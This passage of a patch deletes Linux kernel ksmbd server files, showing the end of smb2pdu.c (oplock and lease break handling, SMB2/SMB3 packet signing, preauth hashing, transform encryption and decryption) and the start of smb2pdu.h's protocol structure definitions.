+-	struct oplock_info *opinfo = NULL;
+-	__le32 err = 0;
+-	int ret = 0;
+-	u64 volatile_id, persistent_id;
+-	char req_oplevel = 0, rsp_oplevel = 0;
+-	unsigned int oplock_change_type;
+-
+-	volatile_id = req->VolatileFid;
+-	persistent_id = req->PersistentFid;
+-	req_oplevel = req->OplockLevel;
+-	ksmbd_debug(OPLOCK, "v_id %llu, p_id %llu request oplock level %d\n",
+-		    volatile_id, persistent_id, req_oplevel);
+-
+-	fp = ksmbd_lookup_fd_slow(work, volatile_id, persistent_id);
+-	if (!fp) {
+-		rsp->hdr.Status = STATUS_FILE_CLOSED;
+-		smb2_set_err_rsp(work);
+-		return;
+-	}
+-
+-	opinfo = opinfo_get(fp);
+-	if (!opinfo) {
+-		pr_err("unexpected null oplock_info\n");
+-		rsp->hdr.Status = STATUS_INVALID_OPLOCK_PROTOCOL;
+-		smb2_set_err_rsp(work);
+-		ksmbd_fd_put(work, fp);
+-		return;
+-	}
+-
+-	if (opinfo->level == SMB2_OPLOCK_LEVEL_NONE) {
+-		rsp->hdr.Status = STATUS_INVALID_OPLOCK_PROTOCOL;
+-		goto err_out;
+-	}
+-
+-	if (opinfo->op_state == OPLOCK_STATE_NONE) {
+-		ksmbd_debug(SMB, "unexpected oplock state 0x%x\n", opinfo->op_state);
+-		rsp->hdr.Status = STATUS_UNSUCCESSFUL;
+-		goto err_out;
+-	}
+-
+-	if ((opinfo->level == SMB2_OPLOCK_LEVEL_EXCLUSIVE ||
+-	     opinfo->level == SMB2_OPLOCK_LEVEL_BATCH) &&
+-	    (req_oplevel != SMB2_OPLOCK_LEVEL_II &&
+-	     req_oplevel != SMB2_OPLOCK_LEVEL_NONE)) {
+-		err = STATUS_INVALID_OPLOCK_PROTOCOL;
+-		oplock_change_type = OPLOCK_WRITE_TO_NONE;
+-	} else if (opinfo->level == SMB2_OPLOCK_LEVEL_II &&
+-		   req_oplevel != SMB2_OPLOCK_LEVEL_NONE) {
+-		err = STATUS_INVALID_OPLOCK_PROTOCOL;
+-		oplock_change_type = OPLOCK_READ_TO_NONE;
+-	} else if (req_oplevel == SMB2_OPLOCK_LEVEL_II ||
+-		   req_oplevel == SMB2_OPLOCK_LEVEL_NONE) {
+-		err = STATUS_INVALID_DEVICE_STATE;
+-		if ((opinfo->level == SMB2_OPLOCK_LEVEL_EXCLUSIVE ||
+-		     opinfo->level == SMB2_OPLOCK_LEVEL_BATCH) &&
+-		    req_oplevel == SMB2_OPLOCK_LEVEL_II) {
+-			oplock_change_type = OPLOCK_WRITE_TO_READ;
+-		} else if ((opinfo->level == SMB2_OPLOCK_LEVEL_EXCLUSIVE ||
+-			    opinfo->level == SMB2_OPLOCK_LEVEL_BATCH) &&
+-			   req_oplevel == SMB2_OPLOCK_LEVEL_NONE) {
+-			oplock_change_type = OPLOCK_WRITE_TO_NONE;
+-		} else if (opinfo->level == SMB2_OPLOCK_LEVEL_II &&
+-			   req_oplevel == SMB2_OPLOCK_LEVEL_NONE) {
+-			oplock_change_type = OPLOCK_READ_TO_NONE;
+-		} else {
+-			oplock_change_type = 0;
+-		}
+-	} else {
+-		oplock_change_type = 0;
+-	}
+-
+-	switch (oplock_change_type) {
+-	case OPLOCK_WRITE_TO_READ:
+-		ret = opinfo_write_to_read(opinfo);
+-		rsp_oplevel = SMB2_OPLOCK_LEVEL_II;
+-		break;
+-	case OPLOCK_WRITE_TO_NONE:
+-		ret = opinfo_write_to_none(opinfo);
+-		rsp_oplevel = SMB2_OPLOCK_LEVEL_NONE;
+-		break;
+-	case OPLOCK_READ_TO_NONE:
+-		ret = opinfo_read_to_none(opinfo);
+-		rsp_oplevel = SMB2_OPLOCK_LEVEL_NONE;
+-		break;
+-	default:
+-		pr_err("unknown oplock change 0x%x -> 0x%x\n",
+-		       opinfo->level, rsp_oplevel);
+-	}
+-
+-	if (ret < 0) {
+-		rsp->hdr.Status = err;
+-		goto err_out;
+-	}
+-
+-	opinfo_put(opinfo);
+-	ksmbd_fd_put(work, fp);
+-	opinfo->op_state = OPLOCK_STATE_NONE;
+-	wake_up_interruptible_all(&opinfo->oplock_q);
+-
+-	rsp->StructureSize = cpu_to_le16(24);
+-	rsp->OplockLevel = rsp_oplevel;
+-	rsp->Reserved = 0;
+-	rsp->Reserved2 = 0;
+-	rsp->VolatileFid = volatile_id;
+-	rsp->PersistentFid = persistent_id;
+-	inc_rfc1001_len(work->response_buf, 24);
+-	return;
+-
+-err_out:
+-	opinfo->op_state = OPLOCK_STATE_NONE;
+-	wake_up_interruptible_all(&opinfo->oplock_q);
+-
+-	opinfo_put(opinfo);
+-	ksmbd_fd_put(work, fp);
+-	smb2_set_err_rsp(work);
+-}
+-
+-static int check_lease_state(struct lease *lease, __le32 req_state)
+-{
+-	if ((lease->new_state ==
+-	     (SMB2_LEASE_READ_CACHING_LE | SMB2_LEASE_HANDLE_CACHING_LE)) &&
+-	    !(req_state & SMB2_LEASE_WRITE_CACHING_LE)) {
+-		lease->new_state = req_state;
+-		return 0;
+-	}
+-
+-	if (lease->new_state == req_state)
+-		return 0;
+-
+-	return 1;
+-}
+-
+-/**
+- * smb21_lease_break_ack() - handler for smb2.1 lease break command
+- * @work:	smb work containing lease break command buffer
+- *
+- * Return:	0
+- */
+-static void smb21_lease_break_ack(struct ksmbd_work *work)
+-{
+-	struct ksmbd_conn *conn = work->conn;
+-	struct smb2_lease_ack *req = smb2_get_msg(work->request_buf);
+-	struct smb2_lease_ack *rsp = smb2_get_msg(work->response_buf);
+-	struct oplock_info *opinfo;
+-	__le32 err = 0;
+-	int ret = 0;
+-	unsigned int lease_change_type;
+-	__le32 lease_state;
+-	struct lease *lease;
+-
+-	ksmbd_debug(OPLOCK, "smb21 lease break, lease state(0x%x)\n",
+-		    le32_to_cpu(req->LeaseState));
+-	opinfo = lookup_lease_in_table(conn, req->LeaseKey);
+-	if (!opinfo) {
+-		ksmbd_debug(OPLOCK, "file not opened\n");
+-		smb2_set_err_rsp(work);
+-		rsp->hdr.Status = STATUS_UNSUCCESSFUL;
+-		return;
+-	}
+-	lease = opinfo->o_lease;
+-
+-	if (opinfo->op_state == OPLOCK_STATE_NONE) {
+-		pr_err("unexpected lease break state 0x%x\n",
+-		       opinfo->op_state);
+-		rsp->hdr.Status = STATUS_UNSUCCESSFUL;
+-		goto err_out;
+-	}
+-
+-	if (check_lease_state(lease, req->LeaseState)) {
+-		rsp->hdr.Status = STATUS_REQUEST_NOT_ACCEPTED;
+-		ksmbd_debug(OPLOCK,
+-			    "req lease state: 0x%x, expected state: 0x%x\n",
+-			    req->LeaseState, lease->new_state);
+-		goto err_out;
+-	}
+-
+-	if (!atomic_read(&opinfo->breaking_cnt)) {
+-		rsp->hdr.Status = STATUS_UNSUCCESSFUL;
+-		goto err_out;
+-	}
+-
+-	/* check for bad lease state */
+-	if (req->LeaseState &
+-	    (~(SMB2_LEASE_READ_CACHING_LE | SMB2_LEASE_HANDLE_CACHING_LE))) {
+-		err = STATUS_INVALID_OPLOCK_PROTOCOL;
+-		if (lease->state & SMB2_LEASE_WRITE_CACHING_LE)
+-			lease_change_type = OPLOCK_WRITE_TO_NONE;
+-		else
+-			lease_change_type = OPLOCK_READ_TO_NONE;
+-		ksmbd_debug(OPLOCK, "handle bad lease state 0x%x -> 0x%x\n",
+-			    le32_to_cpu(lease->state),
+-			    le32_to_cpu(req->LeaseState));
+-	} else if (lease->state == SMB2_LEASE_READ_CACHING_LE &&
+-		   req->LeaseState != SMB2_LEASE_NONE_LE) {
+-		err = STATUS_INVALID_OPLOCK_PROTOCOL;
+-		lease_change_type = OPLOCK_READ_TO_NONE;
+-		ksmbd_debug(OPLOCK, "handle bad lease state 0x%x -> 0x%x\n",
+-			    le32_to_cpu(lease->state),
+-			    le32_to_cpu(req->LeaseState));
+-	} else {
+-		/* valid lease state changes */
+-		err = STATUS_INVALID_DEVICE_STATE;
+-		if (req->LeaseState == SMB2_LEASE_NONE_LE) {
+-			if (lease->state & SMB2_LEASE_WRITE_CACHING_LE)
+-				lease_change_type = OPLOCK_WRITE_TO_NONE;
+-			else
+-				lease_change_type = OPLOCK_READ_TO_NONE;
+-		} else if (req->LeaseState & SMB2_LEASE_READ_CACHING_LE) {
+-			if (lease->state & SMB2_LEASE_WRITE_CACHING_LE)
+-				lease_change_type = OPLOCK_WRITE_TO_READ;
+-			else
+-				lease_change_type = OPLOCK_READ_HANDLE_TO_READ;
+-		} else {
+-			lease_change_type = 0;
+-		}
+-	}
+-
+-	switch (lease_change_type) {
+-	case OPLOCK_WRITE_TO_READ:
+-		ret = opinfo_write_to_read(opinfo);
+-		break;
+-	case OPLOCK_READ_HANDLE_TO_READ:
+-		ret = opinfo_read_handle_to_read(opinfo);
+-		break;
+-	case OPLOCK_WRITE_TO_NONE:
+-		ret = opinfo_write_to_none(opinfo);
+-		break;
+-	case OPLOCK_READ_TO_NONE:
+-		ret = opinfo_read_to_none(opinfo);
+-		break;
+-	default:
+-		ksmbd_debug(OPLOCK, "unknown lease change 0x%x -> 0x%x\n",
+-			    le32_to_cpu(lease->state),
+-			    le32_to_cpu(req->LeaseState));
+-	}
+-
+-	lease_state = lease->state;
+-	opinfo->op_state = OPLOCK_STATE_NONE;
+-	wake_up_interruptible_all(&opinfo->oplock_q);
+-	atomic_dec(&opinfo->breaking_cnt);
+-	wake_up_interruptible_all(&opinfo->oplock_brk);
+-	opinfo_put(opinfo);
+-
+-	if (ret < 0) {
+-		rsp->hdr.Status = err;
+-		goto err_out;
+-	}
+-
+-	rsp->StructureSize = cpu_to_le16(36);
+-	rsp->Reserved = 0;
+-	rsp->Flags = 0;
+-	memcpy(rsp->LeaseKey, req->LeaseKey, 16);
+-	rsp->LeaseState = lease_state;
+-	rsp->LeaseDuration = 0;
+-	inc_rfc1001_len(work->response_buf, 36);
+-	return;
+-
+-err_out:
+-	opinfo->op_state = OPLOCK_STATE_NONE;
+-	wake_up_interruptible_all(&opinfo->oplock_q);
+-	atomic_dec(&opinfo->breaking_cnt);
+-	wake_up_interruptible_all(&opinfo->oplock_brk);
+-
+-	opinfo_put(opinfo);
+-	smb2_set_err_rsp(work);
+-}
+-
+-/**
+- * smb2_oplock_break() - dispatcher for smb2.0 and 2.1 oplock/lease break
+- * @work:	smb work containing oplock/lease break command buffer
+- *
+- * Return:	0
+- */
+-int smb2_oplock_break(struct ksmbd_work *work)
+-{
+-	struct smb2_oplock_break *req = smb2_get_msg(work->request_buf);
+-	struct smb2_oplock_break *rsp = smb2_get_msg(work->response_buf);
+-
+-	switch (le16_to_cpu(req->StructureSize)) {
+-	case OP_BREAK_STRUCT_SIZE_20:
+-		smb20_oplock_break_ack(work);
+-		break;
+-	case OP_BREAK_STRUCT_SIZE_21:
+-		smb21_lease_break_ack(work);
+-		break;
+-	default:
+-		ksmbd_debug(OPLOCK, "invalid break cmd %d\n",
+-			    le16_to_cpu(req->StructureSize));
+-		rsp->hdr.Status = STATUS_INVALID_PARAMETER;
+-		smb2_set_err_rsp(work);
+-	}
+-
+-	return 0;
+-}
+-
+-/**
+- * smb2_notify() - handler for smb2 notify request
+- * @work:   smb work containing notify command buffer
+- *
+- * Return:      0
+- */
+-int smb2_notify(struct ksmbd_work *work)
+-{
+-	struct smb2_change_notify_req *req;
+-	struct smb2_change_notify_rsp *rsp;
+-
+-	WORK_BUFFERS(work, req, rsp);
+-
+-	if (work->next_smb2_rcv_hdr_off && req->hdr.NextCommand) {
+-		rsp->hdr.Status = STATUS_INTERNAL_ERROR;
+-		smb2_set_err_rsp(work);
+-		return 0;
+-	}
+-
+-	smb2_set_err_rsp(work);
+-	rsp->hdr.Status = STATUS_NOT_IMPLEMENTED;
+-	return 0;
+-}
+-
+-/**
+- * smb2_is_sign_req() - handler for checking packet signing status
+- * @work:	smb work containing notify command buffer
+- * @command:	SMB2 command id
+- *
+- * Return:	true if packed is signed, false otherwise
+- */
+-bool smb2_is_sign_req(struct ksmbd_work *work, unsigned int command)
+-{
+-	struct smb2_hdr *rcv_hdr2 = smb2_get_msg(work->request_buf);
+-
+-	if ((rcv_hdr2->Flags & SMB2_FLAGS_SIGNED) &&
+-	    command != SMB2_NEGOTIATE_HE &&
+-	    command != SMB2_SESSION_SETUP_HE &&
+-	    command != SMB2_OPLOCK_BREAK_HE)
+-		return true;
+-
+-	return false;
+-}
+-
+-/**
+- * smb2_check_sign_req() - handler for req packet sign processing
+- * @work:   smb work containing notify command buffer
+- *
+- * Return:	1 on success, 0 otherwise
+- */
+-int smb2_check_sign_req(struct ksmbd_work *work)
+-{
+-	struct smb2_hdr *hdr;
+-	char signature_req[SMB2_SIGNATURE_SIZE];
+-	char signature[SMB2_HMACSHA256_SIZE];
+-	struct kvec iov[1];
+-	size_t len;
+-
+-	hdr = smb2_get_msg(work->request_buf);
+-	if (work->next_smb2_rcv_hdr_off)
+-		hdr = ksmbd_req_buf_next(work);
+-
+-	if (!hdr->NextCommand && !work->next_smb2_rcv_hdr_off)
+-		len = get_rfc1002_len(work->request_buf);
+-	else if (hdr->NextCommand)
+-		len = le32_to_cpu(hdr->NextCommand);
+-	else
+-		len = get_rfc1002_len(work->request_buf) -
+-			work->next_smb2_rcv_hdr_off;
+-
+-	memcpy(signature_req, hdr->Signature, SMB2_SIGNATURE_SIZE);
+-	memset(hdr->Signature, 0, SMB2_SIGNATURE_SIZE);
+-
+-	iov[0].iov_base = (char *)&hdr->ProtocolId;
+-	iov[0].iov_len = len;
+-
+-	if (ksmbd_sign_smb2_pdu(work->conn, work->sess->sess_key, iov, 1,
+-				signature))
+-		return 0;
+-
+-	if (memcmp(signature, signature_req, SMB2_SIGNATURE_SIZE)) {
+-		pr_err("bad smb2 signature\n");
+-		return 0;
+-	}
+-
+-	return 1;
+-}
+-
+-/**
+- * smb2_set_sign_rsp() - handler for rsp packet sign processing
+- * @work:   smb work containing notify command buffer
+- *
+- */
+-void smb2_set_sign_rsp(struct ksmbd_work *work)
+-{
+-	struct smb2_hdr *hdr;
+-	struct smb2_hdr *req_hdr;
+-	char signature[SMB2_HMACSHA256_SIZE];
+-	struct kvec iov[2];
+-	size_t len;
+-	int n_vec = 1;
+-
+-	hdr = smb2_get_msg(work->response_buf);
+-	if (work->next_smb2_rsp_hdr_off)
+-		hdr = ksmbd_resp_buf_next(work);
+-
+-	req_hdr = ksmbd_req_buf_next(work);
+-
+-	if (!work->next_smb2_rsp_hdr_off) {
+-		len = get_rfc1002_len(work->response_buf);
+-		if (req_hdr->NextCommand)
+-			len = ALIGN(len, 8);
+-	} else {
+-		len = get_rfc1002_len(work->response_buf) -
+-			work->next_smb2_rsp_hdr_off;
+-		len = ALIGN(len, 8);
+-	}
+-
+-	if (req_hdr->NextCommand)
+-		hdr->NextCommand = cpu_to_le32(len);
+-
+-	hdr->Flags |= SMB2_FLAGS_SIGNED;
+-	memset(hdr->Signature, 0, SMB2_SIGNATURE_SIZE);
+-
+-	iov[0].iov_base = (char *)&hdr->ProtocolId;
+-	iov[0].iov_len = len;
+-
+-	if (work->aux_payload_sz) {
+-		iov[0].iov_len -= work->aux_payload_sz;
+-
+-		iov[1].iov_base = work->aux_payload_buf;
+-		iov[1].iov_len = work->aux_payload_sz;
+-		n_vec++;
+-	}
+-
+-	if (!ksmbd_sign_smb2_pdu(work->conn, work->sess->sess_key, iov, n_vec,
+-				 signature))
+-		memcpy(hdr->Signature, signature, SMB2_SIGNATURE_SIZE);
+-}
+-
+-/**
+- * smb3_check_sign_req() - handler for req packet sign processing
+- * @work:   smb work containing notify command buffer
+- *
+- * Return:	1 on success, 0 otherwise
+- */
+-int smb3_check_sign_req(struct ksmbd_work *work)
+-{
+-	struct ksmbd_conn *conn = work->conn;
+-	char *signing_key;
+-	struct smb2_hdr *hdr;
+-	struct channel *chann;
+-	char signature_req[SMB2_SIGNATURE_SIZE];
+-	char signature[SMB2_CMACAES_SIZE];
+-	struct kvec iov[1];
+-	size_t len;
+-
+-	hdr = smb2_get_msg(work->request_buf);
+-	if (work->next_smb2_rcv_hdr_off)
+-		hdr = ksmbd_req_buf_next(work);
+-
+-	if (!hdr->NextCommand && !work->next_smb2_rcv_hdr_off)
+-		len = get_rfc1002_len(work->request_buf);
+-	else if (hdr->NextCommand)
+-		len = le32_to_cpu(hdr->NextCommand);
+-	else
+-		len = get_rfc1002_len(work->request_buf) -
+-			work->next_smb2_rcv_hdr_off;
+-
+-	if (le16_to_cpu(hdr->Command) == SMB2_SESSION_SETUP_HE) {
+-		signing_key = work->sess->smb3signingkey;
+-	} else {
+-		chann = lookup_chann_list(work->sess, conn);
+-		if (!chann) {
+-			return 0;
+-		}
+-		signing_key = chann->smb3signingkey;
+-	}
+-
+-	if (!signing_key) {
+-		pr_err("SMB3 signing key is not generated\n");
+-		return 0;
+-	}
+-
+-	memcpy(signature_req, hdr->Signature, SMB2_SIGNATURE_SIZE);
+-	memset(hdr->Signature, 0, SMB2_SIGNATURE_SIZE);
+-	iov[0].iov_base = (char *)&hdr->ProtocolId;
+-	iov[0].iov_len = len;
+-
+-	if (ksmbd_sign_smb3_pdu(conn, signing_key, iov, 1, signature))
+-		return 0;
+-
+-	if (memcmp(signature, signature_req, SMB2_SIGNATURE_SIZE)) {
+-		pr_err("bad smb2 signature\n");
+-		return 0;
+-	}
+-
+-	return 1;
+-}
+-
+-/**
+- * smb3_set_sign_rsp() - handler for rsp packet sign processing
+- * @work:   smb work containing notify command buffer
+- *
+- */
+-void smb3_set_sign_rsp(struct ksmbd_work *work)
+-{
+-	struct ksmbd_conn *conn = work->conn;
+-	struct smb2_hdr *req_hdr, *hdr;
+-	struct channel *chann;
+-	char signature[SMB2_CMACAES_SIZE];
+-	struct kvec iov[2];
+-	int n_vec = 1;
+-	size_t len;
+-	char *signing_key;
+-
+-	hdr = smb2_get_msg(work->response_buf);
+-	if (work->next_smb2_rsp_hdr_off)
+-		hdr = ksmbd_resp_buf_next(work);
+-
+-	req_hdr = ksmbd_req_buf_next(work);
+-
+-	if (!work->next_smb2_rsp_hdr_off) {
+-		len = get_rfc1002_len(work->response_buf);
+-		if (req_hdr->NextCommand)
+-			len = ALIGN(len, 8);
+-	} else {
+-		len = get_rfc1002_len(work->response_buf) -
+-			work->next_smb2_rsp_hdr_off;
+-		len = ALIGN(len, 8);
+-	}
+-
+-	if (conn->binding == false &&
+-	    le16_to_cpu(hdr->Command) == SMB2_SESSION_SETUP_HE) {
+-		signing_key = work->sess->smb3signingkey;
+-	} else {
+-		chann = lookup_chann_list(work->sess, work->conn);
+-		if (!chann) {
+-			return;
+-		}
+-		signing_key = chann->smb3signingkey;
+-	}
+-
+-	if (!signing_key)
+-		return;
+-
+-	if (req_hdr->NextCommand)
+-		hdr->NextCommand = cpu_to_le32(len);
+-
+-	hdr->Flags |= SMB2_FLAGS_SIGNED;
+-	memset(hdr->Signature, 0, SMB2_SIGNATURE_SIZE);
+-	iov[0].iov_base = (char *)&hdr->ProtocolId;
+-	iov[0].iov_len = len;
+-	if (work->aux_payload_sz) {
+-		iov[0].iov_len -= work->aux_payload_sz;
+-		iov[1].iov_base = work->aux_payload_buf;
+-		iov[1].iov_len = work->aux_payload_sz;
+-		n_vec++;
+-	}
+-
+-	if (!ksmbd_sign_smb3_pdu(conn, signing_key, iov, n_vec, signature))
+-		memcpy(hdr->Signature, signature, SMB2_SIGNATURE_SIZE);
+-}
+-
+-/**
+- * smb3_preauth_hash_rsp() - handler for computing preauth hash on response
+- * @work:   smb work containing response buffer
+- *
+- */
+-void smb3_preauth_hash_rsp(struct ksmbd_work *work)
+-{
+-	struct ksmbd_conn *conn = work->conn;
+-	struct ksmbd_session *sess = work->sess;
+-	struct smb2_hdr *req, *rsp;
+-
+-	if (conn->dialect != SMB311_PROT_ID)
+-		return;
+-
+-	WORK_BUFFERS(work, req, rsp);
+-
+-	if (le16_to_cpu(req->Command) == SMB2_NEGOTIATE_HE &&
+-	    conn->preauth_info)
+-		ksmbd_gen_preauth_integrity_hash(conn, work->response_buf,
+-						 conn->preauth_info->Preauth_HashValue);
+-
+-	if (le16_to_cpu(rsp->Command) == SMB2_SESSION_SETUP_HE && sess) {
+-		__u8 *hash_value;
+-
+-		if (conn->binding) {
+-			struct preauth_session *preauth_sess;
+-
+-			preauth_sess = ksmbd_preauth_session_lookup(conn, sess->id);
+-			if (!preauth_sess)
+-				return;
+-			hash_value = preauth_sess->Preauth_HashValue;
+-		} else {
+-			hash_value = sess->Preauth_HashValue;
+-			if (!hash_value)
+-				return;
+-		}
+-		ksmbd_gen_preauth_integrity_hash(conn, work->response_buf,
+-						 hash_value);
+-	}
+-}
+-
+-static void fill_transform_hdr(void *tr_buf, char *old_buf, __le16 cipher_type)
+-{
+-	struct smb2_transform_hdr *tr_hdr = tr_buf + 4;
+-	struct smb2_hdr *hdr = smb2_get_msg(old_buf);
+-	unsigned int orig_len = get_rfc1002_len(old_buf);
+-
+-	/* tr_buf must be cleared by the caller */
+-	tr_hdr->ProtocolId = SMB2_TRANSFORM_PROTO_NUM;
+-	tr_hdr->OriginalMessageSize = cpu_to_le32(orig_len);
+-	tr_hdr->Flags = cpu_to_le16(TRANSFORM_FLAG_ENCRYPTED);
+-	if (cipher_type == SMB2_ENCRYPTION_AES128_GCM ||
+-	    cipher_type == SMB2_ENCRYPTION_AES256_GCM)
+-		get_random_bytes(&tr_hdr->Nonce, SMB3_AES_GCM_NONCE);
+-	else
+-		get_random_bytes(&tr_hdr->Nonce, SMB3_AES_CCM_NONCE);
+-	memcpy(&tr_hdr->SessionId, &hdr->SessionId, 8);
+-	inc_rfc1001_len(tr_buf, sizeof(struct smb2_transform_hdr));
+-	inc_rfc1001_len(tr_buf, orig_len);
+-}
+-
+-int smb3_encrypt_resp(struct ksmbd_work *work)
+-{
+-	char *buf = work->response_buf;
+-	struct kvec iov[3];
+-	int rc = -ENOMEM;
+-	int buf_size = 0, rq_nvec = 2 + (work->aux_payload_sz ? 1 : 0);
+-
+-	if (ARRAY_SIZE(iov) < rq_nvec)
+-		return -ENOMEM;
+-
+-	work->tr_buf = kzalloc(sizeof(struct smb2_transform_hdr) + 4, GFP_KERNEL);
+-	if (!work->tr_buf)
+-		return rc;
+-
+-	/* fill transform header */
+-	fill_transform_hdr(work->tr_buf, buf, work->conn->cipher_type);
+-
+-	iov[0].iov_base = work->tr_buf;
+-	iov[0].iov_len = sizeof(struct smb2_transform_hdr) + 4;
+-	buf_size += iov[0].iov_len - 4;
+-
+-	iov[1].iov_base = buf + 4;
+-	iov[1].iov_len = get_rfc1002_len(buf);
+-	if (work->aux_payload_sz) {
+-		iov[1].iov_len = work->resp_hdr_sz - 4;
+-
+-		iov[2].iov_base = work->aux_payload_buf;
+-		iov[2].iov_len = work->aux_payload_sz;
+-		buf_size += iov[2].iov_len;
+-	}
+-	buf_size += iov[1].iov_len;
+-	work->resp_hdr_sz = iov[1].iov_len;
+-
+-	rc = ksmbd_crypt_message(work, iov, rq_nvec, 1);
+-	if (rc)
+-		return rc;
+-
+-	memmove(buf, iov[1].iov_base, iov[1].iov_len);
+-	*(__be32 *)work->tr_buf = cpu_to_be32(buf_size);
+-
+-	return rc;
+-}
+-
+-bool smb3_is_transform_hdr(void *buf)
+-{
+-	struct smb2_transform_hdr *trhdr = smb2_get_msg(buf);
+-
+-	return trhdr->ProtocolId == SMB2_TRANSFORM_PROTO_NUM;
+-}
+-
+-int smb3_decrypt_req(struct ksmbd_work *work)
+-{
+-	struct ksmbd_session *sess;
+-	char *buf = work->request_buf;
+-	unsigned int pdu_length = get_rfc1002_len(buf);
+-	struct kvec iov[2];
+-	int buf_data_size = pdu_length - sizeof(struct smb2_transform_hdr);
+-	struct smb2_transform_hdr *tr_hdr = smb2_get_msg(buf);
+-	int rc = 0;
+-
+-	if (buf_data_size < sizeof(struct smb2_hdr)) {
+-		pr_err("Transform message is too small (%u)\n",
+-		       pdu_length);
+-		return -ECONNABORTED;
+-	}
+-
+-	if (buf_data_size < le32_to_cpu(tr_hdr->OriginalMessageSize)) {
+-		pr_err("Transform message is broken\n");
+-		return -ECONNABORTED;
+-	}
+-
+-	sess = ksmbd_session_lookup_all(work->conn, le64_to_cpu(tr_hdr->SessionId));
+-	if (!sess) {
+-		pr_err("invalid session id(%llx) in transform header\n",
+-		       le64_to_cpu(tr_hdr->SessionId));
+-		return -ECONNABORTED;
+-	}
+-
+-	iov[0].iov_base = buf;
+-	iov[0].iov_len = sizeof(struct smb2_transform_hdr) + 4;
+-	iov[1].iov_base = buf + sizeof(struct smb2_transform_hdr) + 4;
+-	iov[1].iov_len = buf_data_size;
+-	rc = ksmbd_crypt_message(work, iov, 2, 0);
+-	if (rc)
+-		return rc;
+-
+-	memmove(buf + 4, iov[1].iov_base, buf_data_size);
+-	*(__be32 *)buf = cpu_to_be32(buf_data_size);
+-
+-	return rc;
+-}
+-
+-bool smb3_11_final_sess_setup_resp(struct ksmbd_work *work)
+-{
+-	struct ksmbd_conn *conn = work->conn;
+-	struct ksmbd_session *sess = work->sess;
+-	struct smb2_hdr *rsp = smb2_get_msg(work->response_buf);
+-
+-	if (conn->dialect < SMB30_PROT_ID)
+-		return false;
+-
+-	if (work->next_smb2_rcv_hdr_off)
+-		rsp = ksmbd_resp_buf_next(work);
+-
+-	if (le16_to_cpu(rsp->Command) == SMB2_SESSION_SETUP_HE &&
+-	    sess->user && !user_guest(sess->user) &&
+-	    rsp->Status == STATUS_SUCCESS)
+-		return true;
+-	return false;
+-}
+diff --git a/fs/ksmbd/smb2pdu.h b/fs/ksmbd/smb2pdu.h
+deleted file mode 100644
+index dd10f8031606b..0000000000000
+--- a/fs/ksmbd/smb2pdu.h
++++ /dev/null
+@@ -1,536 +0,0 @@
+-/* SPDX-License-Identifier: GPL-2.0-or-later */
+-/*
+- *   Copyright (C) 2016 Namjae Jeon <linkinjeon@kernel.org>
+- *   Copyright (C) 2018 Samsung Electronics Co., Ltd.
+- */
+-
+-#ifndef _SMB2PDU_H
+-#define _SMB2PDU_H
+-
+-#include "ntlmssp.h"
+-#include "smbacl.h"
+-
+-/*Create Action Flags*/
+-#define FILE_SUPERSEDED                0x00000000
+-#define FILE_OPENED            0x00000001
+-#define FILE_CREATED           0x00000002
+-#define FILE_OVERWRITTEN       0x00000003
+-
+-/* SMB2 Max Credits */
+-#define SMB2_MAX_CREDITS		8192
+-
+-/* BB FIXME - analyze following length BB */
+-#define MAX_SMB2_HDR_SIZE 0x78 /* 4 len + 64 hdr + (2*24 wct) + 2 bct + 2 pad */
+-
+-#define SMB21_DEFAULT_IOSIZE	(1024 * 1024)
+-#define SMB3_DEFAULT_TRANS_SIZE	(1024 * 1024)
+-#define SMB3_MIN_IOSIZE		(64 * 1024)
+-#define SMB3_MAX_IOSIZE		(8 * 1024 * 1024)
+-#define SMB3_MAX_MSGSIZE	(4 * 4096)
+-
+-/*
+- *	Definitions for SMB2 Protocol Data Units (network frames)
+- *
+- *  See MS-SMB2.PDF specification for protocol details.
+- *  The Naming convention is the lower case version of the SMB2
+- *  command code name for the struct. Note that structures must be packed.
+- *
+- */
+-
+-struct preauth_integrity_info {
+-	/* PreAuth integrity Hash ID */
+-	__le16			Preauth_HashId;
+-	/* PreAuth integrity Hash Value */
+-	__u8			Preauth_HashValue[SMB2_PREAUTH_HASH_SIZE];
+-};
+-
+-/* offset is sizeof smb2_negotiate_rsp but rounded up to 8 bytes. */
+-#ifdef CONFIG_SMB_SERVER_KERBEROS5
+-/* sizeof(struct smb2_negotiate_rsp) =
+- * header(64) + response(64) + GSS_LENGTH(96) + GSS_PADDING(0)
+- */
+-#define OFFSET_OF_NEG_CONTEXT	0xe0
+-#else
+-/* sizeof(struct smb2_negotiate_rsp) =
+- * header(64) + response(64) + GSS_LENGTH(74) + GSS_PADDING(6)
+- */
+-#define OFFSET_OF_NEG_CONTEXT	0xd0
+-#endif
+-
+-#define SMB2_SESSION_EXPIRED		(0)
+-#define SMB2_SESSION_IN_PROGRESS	BIT(0)
+-#define SMB2_SESSION_VALID		BIT(1)
+-
+-#define SMB2_SESSION_TIMEOUT		(10 * HZ)
+-
+-struct create_durable_req_v2 {
+-	struct create_context ccontext;
+-	__u8   Name[8];
+-	__le32 Timeout;
+-	__le32 Flags;
+-	__u8 Reserved[8];
+-	__u8 CreateGuid[16];
+-} __packed;
+-
+-struct create_durable_reconn_req {
+-	struct create_context ccontext;
+-	__u8   Name[8];
+-	union {
+-		__u8  Reserved[16];
+-		struct {
+-			__u64 PersistentFileId;
+-			__u64 VolatileFileId;
+-		} Fid;
+-	} Data;
+-} __packed;
+-
+-struct create_durable_reconn_v2_req {
+-	struct create_context ccontext;
+-	__u8   Name[8];
+-	struct {
+-		__u64 PersistentFileId;
+-		__u64 VolatileFileId;
+-	} Fid;
+-	__u8 CreateGuid[16];
+-	__le32 Flags;
+-} __packed;
+-
+-struct create_app_inst_id {
+-	struct create_context ccontext;
+-	__u8 Name[8];
+-	__u8 Reserved[8];
+-	__u8 AppInstanceId[16];
+-} __packed;
+-
+-struct create_app_inst_id_vers {
+-	struct create_context ccontext;
+-	__u8 Name[8];
+-	__u8 Reserved[2];
+-	__u8 Padding[4];
+-	__le64 AppInstanceVersionHigh;
+-	__le64 AppInstanceVersionLow;
+-} __packed;
+-
+-struct create_mxac_req {
+-	struct create_context ccontext;
+-	__u8   Name[8];
+-	__le64 Timestamp;
+-} __packed;
+-
+-struct create_alloc_size_req {
+-	struct create_context ccontext;
+-	__u8   Name[8];
+-	__le64 AllocationSize;
+-} __packed;
+-
+-struct create_durable_rsp {
+-	struct create_context ccontext;
+-	__u8   Name[8];
+-	union {
+-		__u8  Reserved[8];
+-		__u64 data;
+-	} Data;
+-} __packed;
+-
+-struct create_durable_v2_rsp {
+-	struct create_context ccontext;
